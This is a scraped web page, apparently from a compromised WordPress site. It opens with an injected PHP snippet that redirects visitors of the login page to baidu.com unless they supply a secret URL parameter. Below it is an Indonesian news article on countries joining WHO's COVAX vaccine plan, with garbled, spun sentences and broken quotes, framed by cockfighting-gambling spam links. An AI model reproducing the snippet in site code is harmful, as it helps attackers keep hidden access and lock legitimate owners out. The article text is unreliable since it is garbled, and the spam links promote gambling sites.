//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } WHO: 156 negara bergabung dalam proyek vaksin Covid-19 | adu ayam bali_s128.net login_s128.live

WHO: 156 negara bergabung dalam proyek vaksin Covid-19

Reporter Tribunnews.com Malhand report-JENEWA TRIBUNNEWS.COM-Di bawah koordinasi Organisasi Kesehatan Dunia (WHO), sebanyak 156 negara telah bergabung dalam rencana distribusi adil vaksin Covid-19 global. 64 negara telah terdaftar. Orang kaya bergabung dengan gerakan itu. Di antara 64 negara ini, tidak ada negara sebesar China, Rusia, dan Amerika Serikat. 9/22/2020).

“Kita harus bersatu untuk menyelesaikan pandemi ini.”

Dia menolak berkomentar tentang beberapa negara yang belum bergabung. Karena pembahasan terus berlanjut. Pemerintah Rusia mengatakan kepada Reuters bahwa negara mereka tidak perlu berpartisipasi dalam rencana tersebut karena sedang mengembangkan dan memproduksi vaksinnya sendiri.

“Namun, kami tidak menutup kemungkinan akan memberikan kami vaksin di masa mendatang. Sumber tersebut mengatakan bahwa peserta COVAX. Kementerian Kesehatan Rusia tidak berkomentar untuk tidak bergabung dengan COVAX. -Fokusnya pada risiko tertinggi di masing-masing negara. Vaksinasi orang pertama, seperti petugas kesehatan.

COVAX bertujuan untuk mendapatkan 2 miliar dosis vaksin yang disetujui pada akhir 2021. —— “Pada dasarnya, pintunya terbuka. Kami terbuka. Apa yang dibujuk untuk memastikan bahwa setiap orang di planet ini memiliki akses ke vaksin, “kata Harris (Reuters)

Leave a comment

adu ayam bali_s128.net login_s128.live